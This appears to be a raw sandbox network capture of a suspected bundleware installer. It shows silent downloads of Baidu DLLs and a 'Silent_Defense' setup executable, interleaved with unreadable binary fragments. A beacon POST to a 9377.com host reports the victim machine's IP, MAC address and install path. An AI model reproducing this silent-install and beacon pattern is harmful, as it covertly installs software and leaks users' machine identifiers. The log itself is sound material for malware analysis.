.E........R<..h.D$(.E.VP.....E..T$(Q..$VP.......D$...u..L$.........
[email protected]$(.E.VP.....E..T$(.....$VP.......D$...u..L$...........RD..p.D
$(.E.VP.....T$(..P.E.VP.....D$...u..L$.......E....RHVP.L$HQ.......RtP.
E.VP....$........|$X...$............D$DP.U....u.....D$...L$..:........
RL..x.D$(.E.VP.....T$(P.E.VP.......D$...u..L$.........E..R|j.VP.....M.
.D$(....4j..D$(...PPVQ.....L$(P.D$(.....D$...u..L$.........P.V.....M.P
...P.Q............D$4..t.P..........$....d......Y_^[..]..)...[........
...(......._...........................B.......{........... .......j.h
(...d.....P...SUVW..v..3.P.D$$d......\$4...PD....3....l$..l$..l$ ...P(
.L$.QS...l$4..3...$.....L$.;.t .D$. ....;.s.......P.QS............P.S.
...9(t.........D$.;.t.P.|.......L$$d......Y_^][..................j.hX.
..d.....P...SUVW..v..3.P.D$,d......l$<.E..PH.L$.Q.....8.E..PD......
.G.3.3.;.~5.L$<.G..T$<...x..u...P.B.U............3..D$<H.
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=491520-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.55/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Range: bytes=327680-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 327680-1176519/1176520

Content-Length: 848840

Age: 1193244

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
..t$..D$.....V.L$..i....D$......D$.P.w......L$.d......Y.........j.h...
.d.....PV.....3.P.D$.d......t$..D$......D$....F.P.L$(.D$ ......D$.....
.L$$Q..\.....L$.d......Y^...........j.hd...d.....PQ.....3.P.D$.d......
t$..D$.....V.L$.......D$......D$.P........L$.d......Y....D....j.h....d
.....P.. SUVW.....3.P.D$4d.......3..\$..\$<.D$D........p...t0.P....
L$HSRP..0...\$..!^...L$.Q.O..D$ ................j.....e........d$LP.L$
[email protected]$4R.\$T.h.........D$<..F.;.t..N. .t.;.w.
..y...F.....3.;.u.3....v. .U.D$.P...W.L$$.t$(.J.......\$<.L$ Q.....
.D$<.....T$HR..[...L$4d......Y_^][..,....j.hJ...d.....P..8SUVW.....
3.P.D$Ld.......3..t$..t$T.|$\.......p...t=.t$...\...L$.Q.M..D$..b....W
....L$`VRP.Q/...D$T.....L$`Q...........;.......t..S. .u...x...C.......
.........T..........D$\......;.}G.49..j......PQ.L$l......D$......U\...
D$..D$.P.M.......D$T.....L$`Q...............8........V.;..L$..D$.wa.$.
......\........F..[...C'...:..[...Q'......[...M'..."..[...L'......8...
........[...?'...L$..D$.j.PQ.L$l.#....T$.R.M.......D$T.....D$`P......H
..............D$\........X............\....u0.....\......d$dQ.L$l.,...
.D$\.W.D$`....J....k....T$\.t$0..`..... ..U.......f.}...D$\f..f.L$\u..
T$\R...D$\P..X...f.E.3..l$$.l$(.l$,.D$T....L$ .3....D$T..t$ .._...O...
UQ.L$hR.$-...............G...j.PQ.L$l..-..........u.......t$\.........
..... ..D$\...K...u.3....C. ...P....a........d$.P.L$l. ....D$\.....t..
QUh00...T$DR.D$l..........D$..D$T..C...u.3....{. . ....ia...L$.Q.T$$.D
$$.D$`R...U.D$0.........D$T..D$0P.8........j.....d$h....Y...?'....
<<< skipped >>>

POST / HTTP/1.1

Connection: Keep-Alive

Content-Length: 188

Content-Type: application/octet-stream

Host: s.x.baidu.com

Keep-Alive: timeout=600,max=1000

...p........" 6c662ebd2fffa805d629b3c9d5a75931(.28...'.bb6.....,U....n..
.....B.. .u..VD.}6.7.6A....J

[email protected].` ...@.%.Y..95( ......2d>...l....e.!O..l.c.C..u^.E7;..f.~.Z.F..`..D.(...
HTTP/1.1 200 OK

Server: iYuntianSvr

Content-Type: application/octet-stream

Keep-Alive: timeout=30

Connection: Keep-Alive

Content-Length: 140
...p........" 6c662ebd2fffa805d629b3c9d5a75931(.28...'.bb6.....,U....n
........B.. .u..VD.}[email protected].` .....%i2Ot..Wp........
..

GET /dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Range: bytes=622592-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Thu, 24 Apr 2014 09:30:27 GMT

Date: Tue, 25 Mar 2014 09:30:27 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 18 Mar 2014 11:58:16 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 622592-926535/926536

Content-Length: 303944

Age: 1451694

Via: 1.0 fjpt155:80 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDLogicUtils.dll"
.......$.D$8.......$....|.UP......l$,......L$ .....P......l$(..$......
..L$ .......$..............$h ..........$............V..$....Pj...Qj.h
.................$..............$h ..........$.....M........|/.L$xQ..$
.......t$4........h......$....R..P..Q..h......$....Rj...$....Pj.h.....
.$.....u.f..$.....l$...$.....L$ .....;.t=f.>*u*...V./.....$........
.....L$0......L$(.....V......D$0.....$..........L$(.`......T$ .U...;.u
........>..F......f=l.u..D$hPQj...........5f=f.u3.T$XRQ..... ....D$
`P.L$\Q.......T$hR.D$dP.......L$h........0.........d....$.P......h....
..$....Rf..f....#.RQ3.f.....Qh..................h......$....Rf..f....#
.f..RQ........Ph...........P...h......$....Rf..f....#.f..RQ........P..
f..f..h......$....P..#.RQj.h............u.f..$......$.....D$ 3.9t$(t(.
t$(...P........u.j.j. .PVj.j............D$ ..t....N.f.....f..u. .....$
.....tK.D$..3. .;.}.....$......$......;.|6..$.........x...?PQ........~
.....$........$......$.....L$.;.~@3...... ..... .;.~...;.}'....$.....d
$...$......f..j ....;.|..l$...~l.D$ ..t*..u. .;.........$......6QP....
hQ.........4.L$(..t2..u... .;.........$.....F.P...T$0..h...........l$.
.|$....2....L$...$....3...9.$....... ... .;.~...;.........$......$....
..f..j ....;.|......f=}.u...C....f=}...$..........f=..rdf=..w^..u....;
.~8..f..i...._^][........B.;.~..........$......RV............f..f..i..
f.K.......f..h.J..u....;.~6..f..j.._^][........B.;.~..........$......R
V............f..f..i........$.....l$...$.......f..........$....;...$..
..........t}....$.......L?.QR........(.......^..$.....t$.....$....
<<< skipped >>>

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=917504-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.55/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /client/dllqq/BDLogicUtils.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=622592-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=917504-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=917504-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 917504-1176519/1176520

Content-Length: 259016

Age: 1193230

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj52:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
 std::basic_string<char,struct std::char_traits<char>,class s
td::allocator<char> >,struct std::less<class std::basic_st
ring<char,struct std::char_traits<char>,class std::allocator&
lt;char> > > >>(const class boost::property_tree::basic
_ptree<class std::basic_string<char,struct std::char_traits<c
har>,class std::allocator<char> >,class std::basic_string&
lt;char,struct std::char_traits<char>,class std::allocator<ch
ar> >,struct std::less<class std::basic_string<char,struct
 std::char_traits<char>,class std::allocator<char> > &g
t; > &)..duplicate key...D:\codes\BaiduAn\stable_proj\include\third
Include\boost/property_tree/string_path.hpp...class std::basic_string&
lt;char,struct std::char_traits<char>,class std::allocator<ch
ar> > __thiscall boost::property_tree::string_path<class std:
:basic_string<char,struct std::char_traits<char>,class std::a
llocator<char> >,struct boost::property_tree::id_translator&l
t;class std::basic_string<char,struct std::char_traits<char>,
class std::allocator<char> > > >::reduce(void)...Path s
yntax error...class std::basic_string<char,struct std::char_traits&
lt;char>,class std::allocator<char> > __thiscall boost::pr
operty_tree::basic_ptree<class std::basic_string<char,struct std
::char_traits<char>,class std::allocator<char> >,class 
std::basic_string<char,struct std::char_traits<char>,clas
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=1114112-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=1114112-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.57/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=65536-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:38 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 1141984

Content-Range: bytes 65536-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
.A4.T$.)..I$....................................................3.....
[email protected]$.j.R...........................
....3..................................L$...3..H..H..H...............A
0....I ...P....................A .8.t..I0...3.................QSU...]8
...E.Tf..tRW.;..tAj..L$..M....G...v....s.....G.V.w........L$.#..G.....
t.....j.....^S.V......_.M.][......................V.....P......u...^..
F0....F ...Q......^..........D$.........3..H..H..H...........D$.......
..3..H..H..H.. .......V...F.....<f..t.j.P...`....u..F.P...a...F....
...<e..^...........V.....f.........^................D$....T$.3.:...
.................D$............#.................A...............A ...
.t=.Q.;.v6.T$....t.:[email protected]".A0....A ......t..A .........3..........
.....Q V.2..u....^.SW.y0......;.s...._[^[email protected]/.A$....t&;.w.9q<v.9A
<s..A<...A< ....I ....._[^._[...^.................Q$....t.9A&
lt;s..A<S.\$....VW.......A .0.........D$.....=....u..Q..A< ..T$.
...%...u....u..Q... ..T$.......t......T$..........A...U.i< .;.]....
.. ..q0..)..q ............y$...........A .0.A4.....7.I4 ....t...ti.2..
tc.D$.....=....u..Q..A< ..T$........u..Q... ..T$.........u..T$...|.
.A....Y< .;... ..q4..)..I$...............D$._3.^...H..H..H.[.......
.........D$..T$.UW.y$......t.9A<s..A<.-....;.......S.\$,...VtN.A
 .0..tE..|n.A....y< .;..` ..q0..)..q .....tO.y$....tF.A .0.A4.....7
.I4 ..../...t(.?..t"..|..A....q< .;....q4 ...)..I$......^[.D$.3._..
.H..H..H.]. ......V......W.|$.t.;.t..5....F.3.;G._.....^..........
<<< skipped >>>

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.56

Range: bytes=1015808-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:21 GMT

Date: Fri, 28 Mar 2014 09:18:21 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 1015808-1176519/1176520

Content-Length: 160712

Age: 1193233

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj56:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
.........................S.......S..".................................
...... T......-T......:T......GT..".......H...........................
.............T.......................2......................".........
...............................T.."...................................
.....T.......T.......U..".......................................@U....
..JU......YU..".......T................................U.......U......
.U.......U.......U.."........................................U.......U
.......U.......U.."....................................... V..".......
 ...............................PV......yV.......V.......V..".......L.
...............................V.."...................................
.....V.......V.......W..".......................................0W..".
......................................`W......jW..".......$...........
.....................W.......W..".......X.............................
...W.......W.."........................................X.."...........
............................@X......JX......TX......aX......lX......vX
.."........................................X..".......@...............
.................X..".......l................................Y.......Y
..".......................................:Y......0Y.."...............
........................pY......xY.......Y.......Y.......Y.......Y....
...Y.......Y.......Y.......Y.......Y.."...............................
........ Z......*Z............................../(....................
..".......|...............................PZ......XZ.."...........
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=1146880-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=884736-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:27 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 322784

Content-Range: bytes 884736-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
3.9n.W..1...h.....D$.UPf.l$..?h.....h.....L$.Q..<a...D$..P....I.f..
...f;.u. ...;.~.f.|D.\t.f.DD.\.f.lD.h......$....URf..$$.....g..j..D$ P
..$,...h....Q.....j.hhN....$<...h....R.R......a....,..$....P..;..F.
..z....= a..h.N..P..;..F...a...j..L$.Q..$ ...h....R.....j.h.N....$0...
h....P....... ..$....Q..;..F.......h.N..P...V.h.N..R.F....F..F.h.N..P.
..N.h.N..Q.F ...V.h.O..R.F$...F(.F.h.O..P...N.h,O..Q.F,[email protected].
..F4.F.h\O..P...N.hxO..Q.F8...V.h.O..R.F<[email protected].
FD..9n..FHt_9n.tZ9n tU9n$tP9n(tK9n,tF9n0tA.N4;.t:9n8t59n<t09n@t 9nD
t&;.t"UU.VLR....t..F....._^]3.[..........F.;..=<b..t.P...n..F.;.t.P
...n.j8U...V..e....._^]..@..[.............D$..@[email protected]
VW3.3.j,.D$H.D$L.D$P.D$XWP.D$4.@...|$L.|$\..e.....h........$....WQ.D$&
lt;[email protected]$B...D$D..D$E.D$F..D$G..D$HO.D$I.D$J..D$K.f..$.....(e
...].3....3.9{..|$..D$..D$..D$..D$ .D$$.|$,.......M.;.......9}.......9
}.t.Q.................M.Q3.h.P....$....h.....D$LR.D$T.D$X.D$\.D$P.....
..b..j0.L$d..$....WQ.D$`..d......D$PP.L$4.T$DQ.T$p.S......W.D$\0....|$
`.|$d.D$h.....|$l.t$p.|$x.|$|..$......$..........$......;.t.=.........
.9}.......9}.......3..L$,Q.M..T$.R.D$..D$..D$ .D$$.D$(.D$,...P.QS.....
......D$ [email protected][email protected]$,...D$..D$....Qj@...|$$..D$...|....|$
....q.......|......D$,P.E..L$.Q.J.PS......K....E...}........O.........
.G.;D$ ..........T$$r..2;1u.............s...t]..2... .uE...........tF.
.2... .u............t/..2... .u............t...2... .t...............3
..........p..E.........O...........;D$...k.......T$.r..2;1u.......
<<< skipped >>>

POST /api/client_data_receive.php?Name=9377chiyue&Channel=gzllq&Version=1.2.4.1&IP=184.107.38.38&MAC=00-0C-29-7C-CD-1F&Installtime=2014/4/11/2:56:49&ExeName=C:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9377chiyue_Y_gzllq.exe HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.9377.com

Content-Length: 195

Connection: Keep-Alive

Cache-Control: no-cache

Name=9377chiyue&Channel=gzllq&Version=1.2.4.1&IP=184.107.38.38&MAC=00-0C-29-7C-CD-1F&Installtime=2014/4/11/2:56:49&ExeName=%Documents and Settings%\%current user%\Local Settings\Temp\9377chiyue_Y_gzllq.exe
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 11 Apr 2014 04:45:55 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding
10d..Array.(.    [Name] => 9377chiyue.    [Channel] => gzllq.   
 [Version] => 1.2.4.1.    [IP] => 184.107.38.38.    [MAC] => 
00-0C-29-7C-CD-1F.    [Installtime] => 2014/4/11/2:56:49.    [ExeNa
me] => %Documents and Settings%\%current user%\Local Settings\Temp\9377chiyue
_Y_gzllq.exe.)...0..

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=786432-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.53/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=425984-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:25 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 781536

Content-Range: bytes 425984-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
..^..............A..T$.3.;B......................A..T$.3.;B...........
...........A..T$.3.;B......................A..T$.3.;B.................
........?............D$.j.P.............................?............D
$.j.P.............................?............D$.j.P.................
............?............D$.j.P.$........................D$.V....h....
Q.l_.....P.S]..i..A..i........ .y........N ..#.9F$^w...... .......V...
N...W.|$.t..F. ....;.r..,l...F...._^.........D$.V....h....Q..^.....P..
\..i..A..i........ .y........N ..#.9F$^w...... .......V...N...W.|$.t..
F. ....;.r...k...F...._^.........D$..............T$...V.t$...;.w.r..B.
;F.|.3.^........^..........................D$.j.P.T...................
........?............D$.j.P.........................................V.
..>.u...j.....N.;H.u...j...V....F...^.........V.......N.W.|$....O.u
...j.....F.;B.u...j...N....._.V.^..........V...>.u..oj.....N.;H.u..
`j...V....F...^.........V.......N.W.|$....O.u..1j.....F.;B.u.."j...N..
..._.V.^..........V......W.|$.t.;.t...i...F. G._...^..............S.\$
.VW.|$...........t.9_.w.;_.v...i...>_.^...^[................S.\$.VW
.|$...........t.9_.w.;_.v..vi...>_.^...^[................V......W.|
$.t.;.t..Ei...F. G._...^..............S.\$.VW.|$...........t.9_.w.;_.v
...i...>_.^...^[[email protected]...>.u...h.....
N.;H.u...h...F....^[email protected]...>.u...h.....N.;
H.u...h...F....^.................?............T$..B.V.0.r..0.~..u..V..
r..p..I.;Q.^u..A....B.....J.;.u......B.....A....B.......T$...V.p..
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=688128-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:42 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 519392

Content-Range: bytes 688128-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
 WPj...x......F....V.t..H...t..@. ....t.WR..J....._^............V...F.
.W.|$.t..F.WPj...x......N......t..V.WRj...r......F......t..F...u...P..
..A.WPj...w......F....V.t..H...t..@. ....t.WR..I....._^.............V.
..F..W.|$.t..F.WPj..&x......N......t..V.WRj...x......F......t..N.WQj..
[email protected]..@. ....
t.WR.II....._^....V...F..W.|$.t..F.WPj...w......N......t...V.WRj...s..
....F....V.t..H...t..@. ....t.WR..H....._^..................V...F..t..
L$..F.QPj..G.........D$..V......t..N..L$..T. ....|^.....8.uU.....8P.uK
...;..G.s......s........L$ .G....T$ R.........t#.F....T$ ....F........
.i...]^_..[Y.]^_2.[Y..........Q..$.....A..L$....Y..............A.V.q..
N.;.}..........N.^..N.;.u....Q........F...Z....N.......F..^...........
..Q..$.....A$.L$....Y.............Q..$.....A..L$....Y.............Q..$
.....A .L$....Y.............Q..$.....A..L$....Y.............Q..$.....A
..L$....Y.............Q..$.....A..L$....Y.............Q..$.....A..L$..
..Y.............Q..$.....A..L$....Y.............j.h....d.....PQVW..v..
3.P.D$.d........t$.3..N..|$........3{...F..F..~..~..F......~(.~,...L$.
d......Y_^...........A(.............j.hC...d.....PQV..v..3.P.D$.d.....
...t$........N..D$...........N..D$...E......D$.......B...L$.d......Y^.
........j.hk...d.....PQ..v..3.P.D$.d.....j0..X......D$....D$.....t....
.....L$.d......Y....3..L$.d......Y................V...N.......N..F,...
..9.^t..0...................QS.\$.VW..3..D$.....9w.~!..$.....G....SQj.
.Am........;w.|..G....W.t..H...t..@. ....t.SR.4?....._^[Y.........
<<< skipped >>>

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.51

Range: bytes=589824-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

